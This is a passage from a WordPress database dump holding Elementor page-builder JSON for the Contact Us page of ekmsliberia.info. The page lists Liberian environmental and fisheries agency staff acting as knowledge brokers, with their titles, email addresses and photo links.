,\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23272,3376,'_elementor_edit_mode','builder'),(23273,3376,'_elementor_template_type','wp-page'),(23274,3376,'_elementor_version','3.0.16'),(23275,3376,'_wp_page_template','default'),(23276,3376,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_s